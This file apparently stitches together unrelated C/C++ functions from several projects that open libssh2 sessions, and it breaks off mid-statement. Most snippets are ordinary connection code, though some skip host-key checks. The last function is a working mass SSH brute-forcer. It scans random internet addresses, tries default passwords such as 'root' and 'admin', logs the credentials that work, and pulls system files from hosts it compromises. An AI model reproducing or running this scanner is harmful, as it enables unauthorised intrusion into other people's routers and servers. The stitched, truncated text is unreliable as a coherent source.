int ssh_init(SSH * pSsh, char * pIp,char * pUsername, char * pPassword) { int ret; int type; const char * fingerprint; size_t len; if (NULL==pSsh) { return 0; } pSsh->sock_fd=socket(AF_INET, SOCK_STREAM, 0); pSsh->sin.sin_family = AF_INET; pSsh->sin.sin_port = htons(22); pSsh->sin.sin_addr.s_addr = inet_addr(pIp); ret = libssh2_init (0); if (ret != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", ret); return 1; } if (connect(pSsh->sock_fd, (struct sockaddr*)(&pSsh->sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } pSsh->session=libssh2_session_init(); if (!pSsh->session) return 0; libssh2_session_set_blocking(pSsh->session, 0); while ((ret = libssh2_session_handshake(pSsh->session, pSsh->sock_fd)) == LIBSSH2_ERROR_EAGAIN); if (ret) { fprintf(stderr, "Failure establishing SSH session: %d\n", ret); return -1; } pSsh->nh = libssh2_knownhost_init(pSsh->session); if(!pSsh->nh) { /* eeek, do cleanup here */ return 2; } libssh2_knownhost_readfile(pSsh->nh, "known_hosts", LIBSSH2_KNOWNHOST_FILE_OPENSSH); libssh2_knownhost_writefile(pSsh->nh, "dumpfile", LIBSSH2_KNOWNHOST_FILE_OPENSSH); fingerprint = libssh2_session_hostkey(pSsh->session, &len, &type); if(fingerprint) { struct libssh2_knownhost *host; int check = libssh2_knownhost_checkp(pSsh->nh, pIp, 22, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN| LIBSSH2_KNOWNHOST_KEYENC_RAW, &host); fprintf(stderr, "Host check: %d, key: %s\n", check, (check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH)? host->key:"<none>"); /***** * At this point, we could verify that 'check' tells us the key is * fine or bail out. *****/ } else { /* eeek, do cleanup here */ return 3; } libssh2_knownhost_free(pSsh->nh); if ( strlen(pPassword) != 0 ) { /* We could authenticate via password */ while ((ret = libssh2_userauth_password(pSsh->session, pUsername, pPassword)) == LIBSSH2_ERROR_EAGAIN); if (ret) { fprintf(stderr, "Authentication by password failed.\n"); //goto shutdown; } } else { /* Or by public key */ while ((ret = libssh2_userauth_publickey_fromfile(pSsh->session, pUsername, "/home/user/" ".ssh/id_rsa.pub", "/home/user/" ".ssh/id_rsa", pPassword)) == LIBSSH2_ERROR_EAGAIN); if (ret) { fprintf(stderr, "\tAuthentication by public key failed\n"); //goto shutdown; } } fprintf(stderr,"ssh_init\n"); return 0; }
int main(int argc, char *argv[]) { const char *hostname = "127.0.0.1"; const char *commandline = "uptime"; const char *username = "******"; const char *password = "******"; unsigned long hostaddr; int sock; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; LIBSSH2_KNOWNHOSTS *nh; int type; #ifdef WIN32 WSADATA wsadata; int err; err = WSAStartup(MAKEWORD(2,0), &wsadata); if (err != 0) { fprintf(stderr, "WSAStartup failed with error: %d\n", err); return 1; } #endif if (argc > 1) /* must be ip address only */ hostname = argv[1]; if (argc > 2) { username = argv[2]; } if (argc > 3) { password = argv[3]; } if (argc > 4) { commandline = argv[4]; } rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); /* Ultra basic "connect to port 22 on localhost" * Your code is responsible for creating the socket establishing the * connection */ sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return -1; } /* Create a session instance */ session = libssh2_session_init(); if (!session) return -1; /* tell libssh2 we want it all done non-blocking */ libssh2_session_set_blocking(session, 0); /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Failure establishing SSH session: %d\n", rc); return -1; } nh = libssh2_knownhost_init(session); if(!nh) { /* eeek, do cleanup here */ return 2; } /* read all hosts from here */ libssh2_knownhost_readfile(nh, "known_hosts", LIBSSH2_KNOWNHOST_FILE_OPENSSH); /* store all known hosts to here */ libssh2_knownhost_writefile(nh, "dumpfile", LIBSSH2_KNOWNHOST_FILE_OPENSSH); fingerprint = libssh2_session_hostkey(session, &len, &type); if(fingerprint) { struct libssh2_knownhost *host; #if LIBSSH2_VERSION_NUM >= 0x010206 /* introduced in 1.2.6 */ int check = libssh2_knownhost_checkp(nh, hostname, 22, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN| LIBSSH2_KNOWNHOST_KEYENC_RAW, &host); #else /* 1.2.5 or older */ int check = libssh2_knownhost_check(nh, hostname, fingerprint, len, LIBSSH2_KNOWNHOST_TYPE_PLAIN| LIBSSH2_KNOWNHOST_KEYENC_RAW, &host); #endif fprintf(stderr, "Host check: %d, key: %s\n", check, (check <= LIBSSH2_KNOWNHOST_CHECK_MISMATCH)? host->key:"<none>"); /***** * At this point, we could verify that 'check' tells us the key is * fine or bail out. *****/ } else { /* eeek, do cleanup here */ return 3; } libssh2_knownhost_free(nh); if ( strlen(password) != 0 ) { /* We could authenticate via password */ while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Authentication by password failed.\n"); goto shutdown; } } else { /* Or by public key */ while ((rc = libssh2_userauth_publickey_fromfile(session, username, "/home/user/" ".ssh/id_rsa.pub", "/home/user/" ".ssh/id_rsa", password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "\tAuthentication by public key failed\n"); goto shutdown; } } #if 0 libssh2_trace(session, ~0 ); #endif /* Exec non-blocking on the remove host */ while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { fprintf(stderr,"Error\n"); exit( 1 ); } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { fprintf(stderr,"Error\n"); exit( 1 ); } for( ;; ) { /* loop until we block */ int rc; do { char buffer[0x4000]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; fprintf(stderr, "We read:\n"); for( i=0; i < rc; ++i ) fputc( buffer[i], stderr); fprintf(stderr, "\n"); } else { if( rc != LIBSSH2_ERROR_EAGAIN ) /* no need to output this for the EAGAIN case */ fprintf(stderr, "libssh2_channel_read returned %d\n", rc); } } while( rc > 0 ); /* this is due to blocking that would occur otherwise so we loop on this condition */ if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) fprintf(stderr, "\nGot signal: %s\n", exitsignal); else fprintf(stderr, "\nEXIT: %d bytecount: %d\n", exitcode, bytecount); libssh2_channel_free(channel); channel = NULL; shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif fprintf(stderr, "all done\n"); libssh2_exit(); return 0; }
void client_d::connect() { try { if( libssh2_init(0) < 0 ) { MACE_SSH_THROW( "Unable to init libssh2" ); } slog( "resolve %1%:%2%", hostname, port ); std::vector<mace::cmt::asio::tcp::endpoint> eps = mace::cmt::asio::tcp::resolve( hostname, boost::lexical_cast<std::string>(port)); slog( "resolved %1% options", eps.size() ); if( eps.size() == 0 ) { MACE_SSH_THROW( "Hostname '%1%' didn't resolve to any endpoints", %hostname ); } m_sock.reset( new boost::asio::ip::tcp::socket( mace::cmt::asio::default_io_service() ) ); for( uint32_t i = 0; i < eps.size(); ++i ) { try { mace::cmt::asio::tcp::connect( *m_sock, eps[i] ); endpt = eps[i]; break; } catch ( ... ) {} } slog( "Creating session" ); m_session = libssh2_session_init(); *libssh2_session_abstract(m_session) = this; BOOST_ASSERT( m_session ); // use non-blocking calls so that we know when to call wait_on_socket libssh2_session_set_blocking( m_session, 0 ); // perform the session handshake, and keep trying while EAGAIN int ec = libssh2_session_handshake( m_session, m_sock->native() ); while( ec == LIBSSH2_ERROR_EAGAIN ) { wait_on_socket(); ec = libssh2_session_handshake( m_session, m_sock->native() ); } // if there was an error, throw it. if( ec < 0 ) { char* msg; libssh2_session_last_error( m_session, &msg, 0, 0 ); MACE_SSH_THROW( "Handshake error: %1% - %2%", %ec %msg ); }
void CLibssh2::handshake() { LIBSSH2_SESSION* session = static_cast<LIBSSH2_SESSION*>(_session); while (true) { // ssh2握手 int errcode = libssh2_session_handshake(session, _socket_fd); if (0 == errcode) { break; } else if (errcode != LIBSSH2_ERROR_EAGAIN) { THROW_EXCEPTION(get_session_errmsg(), get_session_errcode()); } else { if (!timedwait_socket()) { THROW_SYSCALL_EXCEPTION("handshake timeout", ETIMEDOUT, "poll"); } } } }
void getClient(char * serverAddress) { int sockFd = makeSocketOrDie(); struct addrinfo * serverInfo = getServerInfo(serverAddress); printf("Connecting to server\n"); connectOrDie(sockFd, serverInfo); printf("Connected to server. Making LIBSSH2 session\n"); LIBSSH2_SESSION * session = makeSession(); libssh2_session_set_blocking(session, 1); libssh2_session_set_timeout(session, 5000); printf("Made session, handshaking\n"); int result = libssh2_session_handshake(session, sockFd); //const char * fingerprint = libssh2_hostkey_hash(session, LIBSSH_HOSTKEY_HASH_SHA1); //TODO: Match the fingerprint against something. if (result) { char * errorMessage; libssh2_session_last_error(session, &errorMessage, NULL, 0); fprintf(stderr, "Error %s handshaking\n", errorMessage); exit(EXIT_FAILURE); } printf("Handshake completed, making SFTP Session\n"); libssh2_userauth_password(session, NETID, PWD); LIBSSH2_SFTP * sftpSession = makeSFTPSession(session); printf("Started SFTP - Downloading file\n"); LIBSSH2_SFTP_HANDLE * fileHandle = libssh2_sftp_open(sftpSession, serverFilePath, LIBSSH2_FXF_READ, 0); readFile(session, sftpSession, fileHandle); libssh2_sftp_shutdown(sftpSession); libssh2_session_disconnect(session, "Done.\n"); libssh2_session_free(session); freeaddrinfo(serverInfo); close(sockFd); }
static int _git_ssh_session_create( LIBSSH2_SESSION** session, git_stream *io) { int rc = 0; LIBSSH2_SESSION* s; git_socket_stream *socket = (git_socket_stream *) io; assert(session); s = libssh2_session_init(); if (!s) { giterr_set(GITERR_NET, "failed to initialize SSH session"); return -1; } do { rc = libssh2_session_handshake(s, socket->s); } while (LIBSSH2_ERROR_EAGAIN == rc || LIBSSH2_ERROR_TIMEOUT == rc); if (rc != LIBSSH2_ERROR_NONE) { ssh_error(s, "failed to start SSH session"); libssh2_session_free(s); return -1; } libssh2_session_set_blocking(s, 1); *session = s; return 0; }
int logon(char* username, char* pass, LIBSSH2_SESSION **session, int sock) { int rc; /* Create a session instance */ if((*session = libssh2_session_init()) == NULL) return -1; //libssh2_session_set_blocking(*session, 0); libssh2_session_set_blocking(*session, 1); //while ((rc = libssh2_session_handshake(*session, sock)) == LIBSSH2_ERROR_EAGAIN); rc = libssh2_session_handshake(*session, sock); if(rc) { fprintf(stderr, "Failure establishing SSH session: %d %s\n", rc, strerror(errno)); return -1; } // while ((rc = libssh2_userauth_password(*session, username, pass)) == LIBSSH2_ERROR_EAGAIN); rc = libssh2_userauth_password(*session, username, pass); if (rc) { fprintf(stderr, "Authentication by password failed.\n"); if(*session != NULL) { libssh2_session_disconnect(*session, ""); libssh2_session_free(*session); } close(sock); libssh2_exit(); return 0; } }
void cql_ccm_bridge_t::start_ssh_connection(const cql_ccm_bridge_configuration_t& settings) { _ssh_internals->_session = libssh2_session_init(); if (!_ssh_internals->_session) throw cql_ccm_bridge_exception_t("cannot create ssh session"); try { if (libssh2_session_handshake(_ssh_internals->_session, _socket)) throw cql_ccm_bridge_exception_t("ssh session handshake failed"); // get authentication modes supported by server char* auth_methods = libssh2_userauth_list(_ssh_internals->_session, settings.ssh_username().c_str(), settings.ssh_username().size()); int auth_result; if (!settings.ssh_public_key_file().empty() && !settings.ssh_private_key_file().empty()) { auth_result = libssh2_userauth_publickey_fromfile(_ssh_internals->_session, settings.ssh_username().c_str(), settings.ssh_public_key_file().c_str(), settings.ssh_private_key_file().c_str(), ""); } else { if (strstr(auth_methods, "password") == NULL) throw cql_ccm_bridge_exception_t("server doesn't support authentication by password"); // try to login using username and password auth_result = libssh2_userauth_password(_ssh_internals->_session, settings.ssh_username().c_str(), settings.ssh_password().c_str()); } if (auth_result != 0) throw cql_ccm_bridge_exception_t("invalid password or user"); if (!(_ssh_internals->_channel = libssh2_channel_open_session(_ssh_internals->_session))) throw cql_ccm_bridge_exception_t("cannot open ssh session"); try { if (libssh2_channel_request_pty(_ssh_internals->_channel, "vanilla")) throw cql_ccm_bridge_exception_t("pty requests failed"); if (libssh2_channel_shell(_ssh_internals->_channel)) throw cql_ccm_bridge_exception_t("cannot open shell"); //TODO: Copy SSL files to remote connection for CCM to enable SSL with Cassandra instances (or use keytool to simply generate the files remotely) } catch (cql_ccm_bridge_exception_t&) { // calls channel_close libssh2_channel_free(_ssh_internals->_channel); } } catch (cql_ccm_bridge_exception_t&) { close_ssh_session(); throw; } }
ssh_conn_t *ssh_connect(param_t *params) { int rc; struct sockaddr_in sin; unsigned long hostaddr; ssh_conn_t *pcon = (ssh_conn_t*)malloc(sizeof(ssh_conn_t)); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return NULL; } /* Ultra basic "connect to port 22 on localhost" * Your code is responsible for creating the socket establishing the * connection */ hostaddr = inet_addr(params->hostname); pcon->sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(22); sin.sin_addr.s_addr = hostaddr; if (connect(pcon->sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "failed to connect!\n"); return NULL; } /* Create a session instance */ pcon->session = libssh2_session_init(); if (!pcon->session) return NULL; /* tell libssh2 we want it all done non-blocking */ libssh2_session_set_blocking(pcon->session, 0); /* ... start it up. This will trade welcome banners, exchange keys, * and setup crypto, compression, and MAC layers */ while ((rc = libssh2_session_handshake(pcon->session, pcon->sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { fprintf(stderr, "Failure establishing SSH session: %d\n", rc); return NULL; } return pcon; shutdown: return NULL; }
static int connect_to_server() { int rc; connected_socket = open_socket_to_openssh_server(); if(connected_socket <= 0) { return -1; } rc = libssh2_session_handshake(connected_session, connected_socket); if(rc != 0) { print_last_session_error("libssh2_session_handshake"); return -1; } return 0; }
utils::TaskState RemoteSessionHandle::DoHandshake() { int rc = libssh2_session_handshake(sessionHandle.GetSession(), sock->native_handle()); if (rc == LIBSSH2_ERROR_EAGAIN) { return utils::TASK_WORKING; } if (rc) { BOOST_THROW_EXCEPTION(SSHHandshakeError{} << ssh_error_string{"RemoteSessionHandle: Error " + lexical_cast<string>(rc) + " during SSH handshake"} << ssh_error_id{rc}); } return utils::TASK_DONE; }
static void ssh_handshake_cb(obfsproxyssh_client_session_t *session) { int rval; evutil_socket_t fd = bufferevent_getfd(session->ssh_ev); rval = libssh2_session_handshake(session->ssh_session, fd); if (LIBSSH2_ERROR_EAGAIN == rval) return; else if (0 != rval || 0 != ssh_validate_hostkey(session)) { libssh2_session_free(session->ssh_session); session->ssh_session = NULL; session_free(session); return; } session->libssh2_cb = ssh_auth_cb; session->libssh2_cb(session); }
static LIBSSH2_SESSION* __guac_ssh_create_session(guac_client* client, int* socket_fd) { int retval; int fd; struct addrinfo* addresses; struct addrinfo* current_address; char connected_address[1024]; char connected_port[64]; ssh_guac_client_data* client_data = (ssh_guac_client_data*) client->data; struct addrinfo hints = { .ai_family = AF_UNSPEC, .ai_socktype = SOCK_STREAM, .ai_protocol = IPPROTO_TCP }; /* Get socket */ fd = socket(AF_INET, SOCK_STREAM, 0); /* Get addresses connection */ if ((retval = getaddrinfo(client_data->hostname, client_data->port, &hints, &addresses))) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR, "Error parsing given address or port: %s", gai_strerror(retval)); return NULL; } /* Attempt connection to each address until success */ current_address = addresses; while (current_address != NULL) { int retval; /* Resolve hostname */ if ((retval = getnameinfo(current_address->ai_addr, current_address->ai_addrlen, connected_address, sizeof(connected_address), connected_port, sizeof(connected_port), NI_NUMERICHOST | NI_NUMERICSERV))) guac_client_log_info(client, "Unable to resolve host: %s", gai_strerror(retval)); /* Connect */ if (connect(fd, current_address->ai_addr, current_address->ai_addrlen) == 0) { guac_client_log_info(client, "Successfully connected to " "host %s, port %s", connected_address, connected_port); /* Done if successful connect */ break; } /* Otherwise log information regarding bind failure */ else guac_client_log_info(client, "Unable to connect to " "host %s, port %s: %s", connected_address, connected_port, strerror(errno)); current_address = current_address->ai_next; } /* If unable to connect to anything, fail */ if (current_address == NULL) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR, "Unable to connect to any addresses."); return NULL; } /* Free addrinfo */ freeaddrinfo(addresses); /* Open SSH session */ LIBSSH2_SESSION* session = libssh2_session_init_ex(NULL, NULL, NULL, client); if (session == NULL) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR, "Session allocation failed."); return NULL; } /* Perform handshake */ if (libssh2_session_handshake(session, fd)) { guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR, "SSH handshake failed."); return NULL; } /* Save file descriptor */ if (socket_fd != NULL) *socket_fd = fd; /* Authenticate with key if available */ if (client_data->key != NULL) { if (!libssh2_userauth_publickey(session, client_data->username, (unsigned char*) client_data->key->public_key, client_data->key->public_key_length, __sign_callback, (void**) client_data->key)) return session; else { char* error_message; libssh2_session_last_error(session, &error_message, NULL, 0); guac_client_abort(client, GUAC_PROTOCOL_STATUS_CLIENT_UNAUTHORIZED, "Public key authentication failed: %s", error_message); return NULL; } } /* Authenticate with password */ if (!libssh2_userauth_password(session, client_data->username, client_data->password)) return session; else { char* error_message; libssh2_session_last_error(session, &error_message, NULL, 0); guac_client_abort(client, GUAC_PROTOCOL_STATUS_CLIENT_UNAUTHORIZED, "Password authentication failed: %s", error_message); return NULL; } }
static int connect_to_ssh(BDRVSSHState *s, QDict *options, int ssh_flags, int creat_mode, Error **errp) { int r, ret; const char *host, *user, *path, *host_key_check; int port; if (!qdict_haskey(options, "host")) { ret = -EINVAL; error_setg(errp, "No hostname was specified"); goto err; } host = qdict_get_str(options, "host"); if (qdict_haskey(options, "port")) { port = qdict_get_int(options, "port"); } else { port = 22; } if (!qdict_haskey(options, "path")) { ret = -EINVAL; error_setg(errp, "No path was specified"); goto err; } path = qdict_get_str(options, "path"); if (qdict_haskey(options, "user")) { user = qdict_get_str(options, "user"); } else { user = g_get_user_name(); if (!user) { error_setg_errno(errp, errno, "Can't get user name"); ret = -errno; goto err; } } if (qdict_haskey(options, "host_key_check")) { host_key_check = qdict_get_str(options, "host_key_check"); } else { host_key_check = "yes"; } /* Construct the host:port name for inet_connect. */ g_free(s->hostport); s->hostport = g_strdup_printf("%s:%d", host, port); /* Open the socket and connect. */ s->sock = inet_connect(s->hostport, errp); if (s->sock < 0) { ret = -errno; goto err; } /* Create SSH session. */ s->session = libssh2_session_init(); if (!s->session) { ret = -EINVAL; session_error_setg(errp, s, "failed to initialize libssh2 session"); goto err; } #if TRACE_LIBSSH2 != 0 libssh2_trace(s->session, TRACE_LIBSSH2); #endif r = libssh2_session_handshake(s->session, s->sock); if (r != 0) { ret = -EINVAL; session_error_setg(errp, s, "failed to establish SSH session"); goto err; } /* Check the remote host's key against known_hosts. */ ret = check_host_key(s, host, port, host_key_check, errp); if (ret < 0) { goto err; } /* Authenticate. */ ret = authenticate(s, user, errp); if (ret < 0) { goto err; } /* Start SFTP. */ s->sftp = libssh2_sftp_init(s->session); if (!s->sftp) { session_error_setg(errp, s, "failed to initialize sftp handle"); ret = -EINVAL; goto err; } /* Open the remote file. */ DPRINTF("opening file %s flags=0x%x creat_mode=0%o", path, ssh_flags, creat_mode); s->sftp_handle = libssh2_sftp_open(s->sftp, path, ssh_flags, creat_mode); if (!s->sftp_handle) { session_error_setg(errp, s, "failed to open remote file '%s'", path); ret = -EINVAL; goto err; } r = libssh2_sftp_fstat(s->sftp_handle, &s->attrs); if (r < 0) { sftp_error_setg(errp, s, "failed to read file attributes"); return -EINVAL; } /* Delete the options we've used; any not deleted will cause the * block layer to give an error about unused options. */ qdict_del(options, "host"); qdict_del(options, "port"); qdict_del(options, "user"); qdict_del(options, "path"); qdict_del(options, "host_key_check"); return 0; err: if (s->sftp_handle) { libssh2_sftp_close(s->sftp_handle); } s->sftp_handle = NULL; if (s->sftp) { libssh2_sftp_shutdown(s->sftp); } s->sftp = NULL; if (s->session) { libssh2_session_disconnect(s->session, "from qemu ssh client: " "error opening connection"); libssh2_session_free(s->session); } s->session = NULL; return ret; }
SSH_SESSION_STATE SSHSession::begin_session(){ ///////////////////////////////////////////// //Perform the connect call if(this->state == ::SESSION_PERFORM_CONNECT || this->state == ::SESSION_CLOSED){ int ret = ::connect(this->sock, (struct sockaddr*)(&this->addr), sizeof(struct sockaddr_in)); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) int ec = WSAGetLastError(); if(ret == SOCKET_ERROR && ec == WSAEWOULDBLOCK) { this->state = ::SESSION_SELECT_SOCKET; } #else if(ret == -1 && errno == EINPROGRESS) { this->state = ::SESSION_SELECT_SOCKET; } #endif //Success (will most likely never happen) ? else if(ret == 0){ this->state = ::SESSION_PERFORM_INIT; //Major error } else{ this->running_procs--; this->state = ::SESSION_OPEN_ERROR; } ///////////////////////////////////////////// //Poll the socket after connect() }else if(this->state == ::SESSION_SELECT_SOCKET){ fd_set fd_write, fd_error; #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) TIMEVAL timeout; #else struct timeval timeout; #endif // timeout after 10 seconds int timeoutSec = 10; FD_ZERO(&fd_write); FD_ZERO(&fd_error); FD_SET(this->sock, &fd_write); FD_SET(this->sock, &fd_error); timeout.tv_sec = timeoutSec; timeout.tv_usec = 0; #if defined( WIN32 ) || defined( _WIN32 ) || defined( __WIN32 ) && !defined( __CYGWIN__ ) int ret = select( 0, NULL, &fd_write, &fd_error, &timeout ); #else int ret = select( this->sock + 1, NULL, &fd_write, &fd_error, &timeout ); #endif //Timed out ? if(ret == 0) { this->state = ::SESSION_OPEN_ERROR; }else{ //socket data ? if(FD_ISSET(this->sock, &fd_write)) { this->state = ::SESSION_PERFORM_INIT; fprintf(stderr, "connect done..\n"); } //socket error else if(FD_ISSET(this->sock, &fd_error)) { this->state = ::SESSION_OPEN_ERROR; this->running_procs--; fprintf(stderr, "connect error..\n"); //Continue polling next pass }else{ this->state = ::SESSION_SELECT_SOCKET; } } ///////////////////////////////////////////// //Initialize the libssh2 session object }else if(this->state == ::SESSION_PERFORM_INIT){ //Create a session instance this->session = libssh2_session_init(); if(!this->session){ this->state = ::SESSION_OPEN_ERROR; } //Notify libssh2 we are non-blocking libssh2_session_set_blocking(this->session, 0); //Move on to the next step this->state = ::SESSION_PERFORM_HANDSHAKE; ///////////////////////////////////////////////////////////////////////////// //Exchange welcome banners,keys and setup crypto, compression, and MAC layers }else if(this->state == ::SESSION_PERFORM_HANDSHAKE){ rc = libssh2_session_handshake(this->session, this->sock); //Blocking ? if(rc == LIBSSH2_ERROR_EAGAIN){ this->state = ::SESSION_PERFORM_HANDSHAKE; //Failure? }else if(rc){ this->state = ::SESSION_OPEN_ERROR; this->running_procs--; } //success ? else if(rc == 0) { this->state = ::SESSION_PERFORM_AUTH; //Check the hostkey's fingerprint against know/stored fingerprint //const char* fingerprint = libssh2_hostkey_hash(this->session, LIBSSH2_HOSTKEY_HASH_SHA1); /*fprintf(stderr, "Fingerprint: "); qDebug() << "Fingerprint: "; for(i = 0; i < 20; i++) { qDebug() << QString((unsigned char)fingerprint[i]); }*/ } ////////////////////////// //Perform authentication } else if(this->state == ::SESSION_PERFORM_AUTH){ //Authenticate via password rc = libssh2_userauth_password(this->session, this->username.toUtf8().constData(), this->password.toUtf8().constData()) ; //blocking if(rc == LIBSSH2_ERROR_EAGAIN){ this->state = ::SESSION_PERFORM_AUTH; } //failure? else if(rc){ this->state = ::SESSION_OPEN_ERROR; this->running_procs--; qDebug() << "auth failed..\n"; //success ? }else if(rc == 0){ this->state = ::SESSION_OPEN; qDebug() << "auth done..\n"; this->running_procs--; qDebug() << this->running_procs; } } return this->state; }
void* thread_func(void* arg) { int sockfd; sockaddr_in serv_addr; char curhost[26]; boost::random::uniform_int_distribution<> dist(1, 9999999999999);//numeric_limits< unsigned long>::max()); boost::random::mt19937 gen((int)pthread_self()+(int)time(NULL)); LIBSSH2_SESSION *session=0; // HCkSsh ssh; srand((int)pthread_self()+rand()+time(NULL)); while (do_scan) { sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) deb("ERROR opening socket: %s\r\n",fmterr()); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)); long flags; flags = fcntl(sockfd, F_GETFL, 0); fcntl(sockfd, F_SETFL, flags | O_NONBLOCK); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(22); do { serv_addr.sin_addr.s_addr = dist(gen);//getrnd(0,100000000000000);//rand();//inet_addr("195.2.253.204") } while (ischecking(serv_addr.sin_addr.s_addr)); strncpy(curhost, inet_ntoa(serv_addr.sin_addr), sizeof(curhost)); addchecking(serv_addr.sin_addr.s_addr); unsigned long chkdist=0; chkdist=dist(gen); int ret; // deb("\rconnecting %16s ", inet_ntoa(serv_addr.sin_addr)); ret=connect(sockfd, (struct sockaddr*) &serv_addr, sizeof( serv_addr)); fd_set fds; //deb("ret:%d errno:%s (%d)\r\n",ret,strerror(errno),errno); // sleep(1); FD_ZERO(&fds); FD_SET(sockfd, &fds); tv.tv_sec = 2; tv.tv_usec = 0; char buf[1024]; if (ret==0 || (ret==-1 && errno == EINPROGRESS)) { ipscanned++; int res = select(sockfd+1, &fds,&fds, 0, &tv); //deb("res:%d errno:%s (%d)\r\n",res,strerror(errno),errno); if (res < 0 && errno != EINTR) { // deb("\r\n%s Error connecting %d - %s\n\r", // curhost, errno, strerror(errno)); } else if (res > 0) { flags &= (~O_NONBLOCK); if ( fcntl(sockfd, F_SETFL, flags) < 0) { deb("Error fcntl(..., F_SETFL) (%s)\n", strerror(errno)); } int rcv; memset(buf, 0, sizeof(buf)); rcv = recv(sockfd, buf, sizeof(buf), MSG_PEEK); //if (rcv>0) // buf[rcv]=0; // if (rcv>0) // deb("rcv: %d %s\r\n",rcv, trim(buf)); const char *username="******"; const char *password="******"; const char *sftppath="/tmp"; int rc; const char *fingerprint; session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); int numTry=0; while (session>0 && (rc = libssh2_session_handshake(session, sockfd)) == LIBSSH2_ERROR_EAGAIN); int u; LIBSSH2_CHANNEL *channel=0; if (rc) { if (rc!=-43) deb("%16s failure establishing SSH session: %d [rnd: %lu, checking: %d]\n", curhost,rc,chkdist,checking.size()); //return -1; } else { totscanned++; fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); deb( "%16s %-50s ", inet_ntoa(serv_addr.sin_addr), trim(buf)); for (int i = 0; i < 20; i++) { deb(KYEL "%02X " RESET, (unsigned char)fingerprint[i]); } deb( "\n"); char* passwords[]={"root","admin","toor","r00t","adm", "secure","pwd","password","god" }; for ( u=0;u<3;u++) { if (libssh2_userauth_password(session, username, passwords[u])) { // deb( "%16s " KRED "Authentication by password failed. [%s]\n" // RESET, inet_ntoa(serv_addr.sin_addr),passwords[u]); continue; } else { deb(KCYN "%16s authenticated %s:%s \r\n" RESET, inet_ntoa(serv_addr.sin_addr), username,passwords[u],totscanned); struct stat fileinfo; channel = libssh2_scp_recv(session, "/etc/services", &fileinfo); if (!channel) { deb(KRED "%16s Unable to open a session: %d\r\n" RESET, inet_ntoa(serv_addr.sin_addr), libssh2_session_last_errno(session)); break; } if (!fileinfo.st_size) { deb(KGRN "%16s router/modem\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size); fdeb("%s %s:%s [router/modem (%s)]\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim(buf)); } else { deb(KGRN "%16s unknown device fs:%d [%s]\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size,trim(buf)); fdeb("%s %s:%s unknown (%s)\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim( buf)); } channel = libssh2_scp_recv(session, "/proc/cpuinfo", &fileinfo); if (!channel) { // deb(KRED "\r\nUnable to open a session: %d\r\n" RESET, // libssh2_session_last_errno(session)); //break; } else { int got=0; char mem[1024]; int amount=sizeof(mem); while (got < fileinfo.st_size) { if ((fileinfo.st_size -got) < amount) { amount = fileinfo.st_size -got; } rc = libssh2_channel_read(channel, mem, amount); if (rc > 0) { deb("mem:%p rc:%d", mem, rc); } else if (rc < 0) { deb("libssh2_channel_read() failed: %d\n", rc); break; } got += rc; } if (mem[0]) deb("mem: %s", mem); } founds++; try { MySexec sexec; sexec.SetSSHHost( curhost ); int ret_code = 